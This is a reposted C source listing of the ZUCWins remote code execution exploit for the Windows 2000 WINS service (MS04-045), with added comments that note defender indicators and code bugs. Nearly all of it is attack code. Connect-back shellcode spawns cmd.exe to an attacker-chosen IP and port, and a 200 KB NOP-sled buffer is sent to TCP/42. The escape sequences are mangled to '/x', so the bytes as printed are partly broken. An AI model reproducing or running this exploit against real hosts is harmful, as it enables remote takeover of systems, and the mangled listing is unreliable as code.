Microsoft WINS Remote Code Execution Exploit (MS04-045)

发表于2005/1/1 12:34:00  834人阅读

Date : 31/12/2004
CAN-2004-1080

/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit                                     */
/* Exploit by: zuc <zuc@hack.it>              		                         */ 
/* works on Windows 2000 SP3/SP4, probably on every language version        */
/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH    */
/*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

	/*
	 * Connect-back payload bytes taken verbatim from the published listing.
	 * main() overwrites offsets 2..3 with the XOR-masked callback port and
	 * offsets 4..7 with the XOR-masked callback IP before sending; the 0x93
	 * constants visible further down in the blob presumably undo that mask
	 * at run time (not traced here).  In this copy the escape prefix has been
	 * mangled to "/x", so the literal as shown does not yield the intended
	 * byte values.  Defenders: the trailing bytes spell out "cmd.exe", which
	 * is a usable string indicator for this payload on the wire.
	 */
	char shellcode[] =
"/xeb/x25/xe9/xfa/x99/xd3/x77/xf6/x02/x06/x6c/x59/x6c/x59/xf8"
"/x1d/x9c/xde/x8c/xd1/x4c/x70/xd4/x03/x58/x46/x57/x53/x32/x5f"
"/x33/x32/x2e/x44/x4c/x4c/x01/xeb/x05/xe8/xf9/xff/xff/xff/x5d"
"/x83/xed/x2c/x6a/x30/x59/x64/x8b/x01/x8b/x40/x0c/x8b/x70/x1c"
"/xad/x8b/x78/x08/x8d/x5f/x3c/x8b/x1b/x01/xfb/x8b/x5b/x78/x01"
"/xfb/x8b/x4b/x1c/x01/xf9/x8b/x53/x24/x01/xfa/x53/x51/x52/x8b"
"/x5b/x20/x01/xfb/x31/xc9/x41/x31/xc0/x99/x8b/x34/x8b/x01/xfe"
"/xac/x31/xc2/xd1/xe2/x84/xc0/x75/xf7/x0f/xb6/x45/x09/x8d/x44"
"/x45/x08/x66/x39/x10/x75/xe1/x66/x31/x10/x5a/x58/x5e/x56/x50"
"/x52/x2b/x4e/x10/x41/x0f/xb7/x0c/x4a/x8b/x04/x88/x01/xf8/x0f"
"/xb6/x4d/x09/x89/x44/x8d/xd8/xfe/x4d/x09/x75/xbe/xfe/x4d/x08"
"/x74/x17/xfe/x4d/x24/x8d/x5d/x1a/x53/xff/xd0/x89/xc7/x6a/x02"
"/x58/x88/x45/x09/x80/x45/x79/x0c/xeb/x82/x50/x8b/x45/x04/x35"
"/x93/x93/x93/x93/x89/x45/x04/x66/x8b/x45/x02/x66/x35/x93/x93"
"/x66/x89/x45/x02/x58/x89/xce/x31/xdb/x53/x53/x53/x53/x56/x46"
"/x56/xff/xd0/x89/xc7/x55/x58/x66/x89/x30/x6a/x10/x55/x57/xff"
"/x55/xe0/x8d/x45/x88/x50/xff/x55/xe8/x55/x55/xff/x55/xec/x8d"
"/x44/x05/x0c/x94/x53/x68/x2e/x65/x78/x65/x68/x5c/x63/x6d/x64"
"/x94/x31/xd2/x8d/x45/xcc/x94/x57/x57/x57/x53/x53/xfe/xca/x01"
"/xf2/x52/x94/x8d/x45/x78/x50/x8d/x45/x88/x50/xb1/x08/x53/x53"
"/x6a/x10/xfe/xce/x52/x53/x53/x53/x55/xff/x55/xf0/x6a/xff/xff"
"/x55/xe4";

/*
 * Fixed leading bytes of the message.  main() copies sizeof(mess)-1 of this
 * to the start of the send buffer, so the terminating NUL is not sent.
 * The second line is a commented-out duplicate of the first.  In this copy
 * the literal that begins below is wrapped across two source lines (an
 * artefact of the page extraction), and the "/x" escape prefix is mangled.
 * Defenders: these leading bytes, on TCP/42, are the stable part of the
 * request and the natural place to anchor a signature.
 */
char mess[] =
"/x00/x03/x0d/x4c/x77/x77/xFF/x77/x05/x4e/x00/x3c/x01/x02/x03/x04"
//  "/x00/x03/x0d/x4c/x77/x77/xFF/x77/x05/x4e/x00/x3c/x01/x02/x03/x04"
	
"/x6c/xf4/x3d/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/
x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05/x00/x02/x4e/x05";
/*
 * Repeat unit appended 30 times after `mess` by main(); it is wrapped
 * across two lines in this copy just like `mess`.
 */
char rep[] =
	
"/x90/x01/x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x00/
x4e/x05/x90/x00/x4e/x05/x90/x00/x4e/x05/x90/x03/x4e/x05/x90/x00/x4e/x05";
/* Prints the synopsis and calls exit(); it does not return. */
void usage();

/*
 * Entry point.  Assembles one buffer -- the fixed bytes in `mess`, 30
 * copies of `rep`, a 200000-byte 0x90 sled with `shellcode` dropped 198000
 * bytes into it -- and pushes it to the target over a single TCP connection
 * to port 42 (the sin_port assignment below) in one send() call.
 *
 * argv[1] victim address (only inet_addr() on it is used; the
 *         gethostbyname() result `hp` is never read, so a hostname would
 *         not resolve here), argv[2] connect-back IP, argv[3] connect-back
 * port.  Any other argc goes to usage(), which exits.
 *
 * Defender notes (CAN-2004-1080 / MS04-045): on the wire this is one client
 * connection to TCP/42 carrying a little over 200 KB, almost all of it a
 * run of 0x90 bytes, which is a straightforward IDS / flow-size indicator.
 * Mitigation is the vendor patch and restricting TCP/42 to known
 * replication partners.  Escape sequences in this copy are mangled ("/x"),
 * so the listing as shown does not reproduce the published byte values.
 *
 * Unused or unchecked: `i` and `len` are never used; `sock2`/`sock3` are
 * never assigned; the return values of connect() and send() are ignored.
 */
int main(int argc, char *argv[])
{ 
int i,sock,sock2,sock3,addr,len=16;
int rc;
  /* XOR masks; the same 0x93 bytes occur inside shellcode[] (see the two
   * xor-style sequences there), presumably to unmask the patched-in values
   * at run time -- not traced here. */
  unsigned long XORIP = 0x93939393;
  unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

/* argc<4 || argc>4 is just argc != 4; usage() exits, so no else is needed. */
if(argc<4 || argc>4)
usage();

/* Mask the callback port/IP and patch them into the payload.  Only the low
 * 2 and 4 bytes of `cbport` (int) and `cbip` (long) are copied, which gives
 * the intended network-order values on a little-endian host. */
cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

/* Two large automatic arrays (~410 KB of stack between them). */
char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
/* Sled fill; the character constant is mangled in this copy like the
 * string escapes above. */
for(ir =0;ir<200000;ir++)mess2[ir]='/x90';
memcpy(mess3,mess,sizeof(mess)-1);
/* `le` tracks the write position in mess3.  `r` is declared here and then
 * named again as the (no-op) init expression of the for below. */
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
	memcpy(mess3+le,rep,sizeof(rep)-1);
	le+=sizeof(rep)-1;
}
/* Sled, then the payload 198000 bytes into it.  sizeof(shellcode) includes
 * the terminating NUL, so one extra byte is copied and counted in lenr. */
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);	/* result never used */

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/* socket() reports failure with -1, and 0 is a valid descriptor, so this
 * test is inverted with respect to both cases. */
if (!sock)
{ 
//printf("socket() error.../n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

/* TCP/42: the WINS replication port targeted by MS04-045. */
mytcp.sin_port=htons(42);

printf("[*] connecting the target/n");

/* `rc` is assigned but never inspected; a failed connect() still falls
 * through to send(). */
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct 
sockaddr_in));
printf("[*] sending exploit/n");
/* Single unchecked send() of lenr bytes; a short write is not handled. */
send(sock,mess3,lenr,0);
printf("[*] exploit sent/n");
sleep(5);
/* Teardown: after close(sock) the further shutdown() calls on `sock` act on
 * a closed descriptor, and close(sock2)/close(sock3) use values that were
 * never assigned (indeterminate -- undefined behaviour). */
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

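/*
 * Print the command-line synopsis and terminate the process.
 *
 * Called from main() when argc != 4.  Never returns: exit(0) ends the
 * process, which is why the caller places nothing after the call.  The
 * message text is kept exactly as published (including this copy's mangled
 * "/n" escapes); the previously declared but unused local was dropped.
 */
void usage(void)
{
	printf("/nUsage: <victim-host> <connectback-ip> <connectback port>/n");
	printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337/n/n");
	exit(0);
}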
